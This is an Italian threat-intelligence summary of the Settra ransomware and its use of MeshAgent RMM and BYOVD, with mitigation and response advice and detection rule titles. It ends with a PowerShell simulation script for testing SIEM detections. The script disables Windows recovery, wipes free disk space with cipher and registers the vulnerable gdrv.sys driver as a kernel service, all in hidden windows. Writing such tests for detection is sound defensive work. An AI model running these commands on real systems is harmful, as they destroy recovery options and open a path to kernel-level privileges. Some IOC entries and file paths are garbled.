Pronti, Partenza, Settra: Nuova Variante del Ransomware Settra Implementa MeshAgent RMM
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Settra è una variante di ransomware recentemente identificata, osservata per la prima volta a giugno 2026, che accede tramite VPN compromesse o credenziali rubate. Gli attori della minaccia utilizzano MeshAgent RMM per la persistenza e impiegano tecniche di Bring Your Own Vulnerable Driver (BYOVD) per eludere i controlli di sicurezza. Dopo aver stabilito l’accesso, criptano i file, disabilitano le opzioni di ripristino e cancellano i registri degli eventi di Windows.
Indagine
Huntress ha investigato due incidenti distinti di ransomware Settra che hanno colpito organizzazioni nei settori dei servizi ai consumatori, retail e manifatturiero. I ricercatori hanno scoperto che gli attaccanti utilizzavano eseguibili di ransomware con nomi derivati dal dominio della vittima e si affidavano a MeshAgent RMM per il comando e controllo. Gli analisti hanno anche osservato tentativi di cancellare lo spazio disco libero con il tool di Windows cipher e rimuovere le partizioni di ripristino usando diskpart.
Mitigazione
I difensori dovrebbero dare priorità alla sicurezza dei punti di accesso remoto come le VPN e rafforzare le protezioni delle credenziali per ridurre il rischio di accesso iniziale. Monitorare le installazioni non autorizzate di RMM e i driver notoriamente vulnerabili può aiutare ad identificare l’attività prima. Le organizzazioni dovrebbero anche rafforzare gli ambienti di ripristino di Windows e proteggere i registri degli eventi da manomissioni non autorizzate.
Risposta
Se viene rilevata attività di Settra, gli endpoint interessati dovrebbero essere isolati immediatamente per fermare ulteriori crittografie e movimenti laterali. I processi RMM non autorizzati come mvtcs.exe o MeshAgent dovrebbero essere identificati e terminati. Chi risponde dovrebbe anche rivedere attentamente i registri degli eventi di Windows, tenendo conto dei tentativi di cancellare i record o abusare di nomi di log errati per eludere i controlli di eliminazione.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Esplorazione sospetta dalla cartella PerfLogs (tramite process_creation)
Possibile tentativo di utilizzo dell’utilità MeshAgent (tramite process_creation)
IOC (SourceIP) da rilevare: Pronti, Settra, Via: Nuove varianti di ransomware Settra distribuiscono MeshAgent RMM
IOC (DestinationIP) da rilevare: Pronti, Settra, Via: Nuove varianti di ransomware Settra distribuiscono MeshAgent RMM
Attività di ransomware Settra con MeshAgent e BYOVD [Creazione di processi Windows]
Esecuzione di simulazione
-
Narrativa & Comandi dell’attacco: L’avversario ha ottenuto l’accesso iniziale e sta preparando il sistema per un payload di ransomware. Per garantire che la vittima non possa facilmente eseguire recuperi o analisi forensi, l’attaccante esegue una serie di comandi: innanzitutto, svuotano la cache DNS per interrompere eventuali connessioni esistenti; in secondo luogo, disabilitano l’Ambiente di Ripristino di Windows (
reagentc) per impedire riparazioni automatiche; in terzo luogo, tentano di sovrascrivere lo spazio libero utilizzandocipherper rendere impossibile il recupero dati. Infine, tentano di caricare un driver vulnerabile (gdrv.sys) per aumentare i privilegi fino alla modalità kernel. Questa sequenza rispecchia il tentativo del ransomware Settra di massimizzare l’impatto e minimizzare le opzioni di recupero. -
Script di test di regressione:
# Script di simulazione del ransomware Settra Write-Host "[!] Inizio simulazione TTP del ransomware Settra..." -ForegroundColor Red # 1. Simula svuotamento della cache DNS (T1070.004) Write-Host "[*] Esecuzione: ipconfig /flushdns" Start-Process cmd.exe -ArgumentList "/c ipconfig /flushdns" -WindowStyle Hidden # 2. Simula disabilità del recupero (T1490) # Nota: richiede privilegi di amministratore Write-Host "[*] Esecuzione: reagentc /disable" Start-Process cmd.exe -ArgumentList "/c reagentc /disable" -WindowStyle Hidden # 3. Simula cancellazione del disco (T1600.002) # Nota: questa è una simulazione; usiamo un percorso fittizio o una flag non distruttiva se possibile, # ma per attivare la regola, dobbiamo usare 'cipher /w:' Write-Host "[*] Esecuzione: cipher /w:C:" Start-Process cmd.exe -ArgumentList "/c cipher /w:C:" -WindowStyle Hidden # 4. Simula caricamento driver BYOVD (T1068) # Simuliamo la linea di comando utilizzata per interagire con un driver come gdrv.sys Write-Host "[*] Simulazione interazione driver con gdrv.sys" Start-Process cmd.exe -ArgumentList "/c copy gdrv.sys C:WindowsTempgdrv.sys" -WindowStyle Hidden Start-Process cmd.exe -ArgumentList "/c sc create MyVulnerableDriver binPath= C:WindowsTempgdrv.sys type= kernel" -WindowStyle Hidden Write-Host "[+] Simulazione completata. Controllare il SIEM per avvisi." -ForegroundColor Green -
Comandi di pulizia:
# Pulizia degli artefatti di simulazione Write-Host "[!] Pulizia della simulazione..." -ForegroundColor Yellow # Rimuovere il servizio simulato sc.exe delete MyVulnerableDriver # Rimuovere il file driver fittizio Remove-Item -Path "C:WindowsTempgdrv.sys" -ErrorAction SilentlyContinue # Nota: in un ambiente reale, reagentc /enable verrebbe usato per ripristinare il recupero, # ma in un test, assicurarsi che l'amministratore lo ripristini manualmente. Write-Host "[+] Pulizia completata. Assicurarsi che il ripristino di Windows sia riattivato manualmente se necessario."